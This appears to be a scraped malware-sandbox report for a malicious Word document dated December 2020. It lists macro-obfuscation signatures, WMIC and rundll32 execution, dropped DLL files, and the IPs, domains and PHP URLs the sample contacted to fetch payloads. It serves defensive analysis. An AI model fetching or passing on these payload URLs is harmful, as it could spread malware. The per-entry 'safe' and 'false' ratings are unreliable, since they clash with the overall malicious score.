Source: C:\Windows\System32\wbem\WMIC.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 333829 Sample: SecuriteInfo.com.VB.Heur.Em... Startdate: 24/12/2020 Architecture: WINDOWS Score: 92 27 Multi AV Scanner detection for submitted file 2->27 29 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->29 31 Document contains an embedded macro with GUI obfuscation 2->31 33 8 other signatures 2->33 7 WMIC.exe 4 18 2->7         started        11 WINWORD.EXE 436 34 2->11         started        process3 dnsIp4 21 sypher.biz 94.130.162.223, 49170, 80 HETZNER-ASDE Germany 7->21 23 wellnessway.co.za 41.185.8.141, 443, 49167 GridhostZA South Africa 7->23 25 5 other IPs or domains 7->25 17 C:\Windows\Temp\5xta3.dll, PE32 7->17 dropped 19 C:\Users\user\AppData\...\q3H69D5AKRPk[1].php, PE32 7->19 dropped 13 rundll32.exe 7->13         started        file5 process6 process7 15 rundll32.exe 13->15         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
94.130.162.223
 unknown Germany
24940 HETZNER-ASDE false
98.142.105.18
 unknown United States
33182 DIMENOCUS false
35.238.218.46
 unknown United States
15169 GOOGLEUS false
41.185.8.141
 unknown South Africa
36943 GridhostZA false
104.18.56.1
 unknown United States
13335 CLOUDFLARENETUS false
160.153.133.217
 unknown United States
21501 GODADDY-AMSDE false

Contacted Domains

Name IP Active
penniesforsense.com 35.238.218.46 true
sypher.biz 94.130.162.223 true
gesdoc.fda.com.pe 98.142.105.18 true
cnkmovil.com 104.18.56.1 true
wellnessway.co.za 41.185.8.141 true
explainervideoz.com 160.153.133.217 true
www.wellnessway.co.za unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://sypher.biz/nx3jY0Jl.php false
  • Avira URL Cloud: safe
 unknown
http://penniesforsense.com/wp-content/plugins/penci-pennews-review/inc/templates/q3H69D5AKRPk.php false
  • Avira URL Cloud: safe
 unknown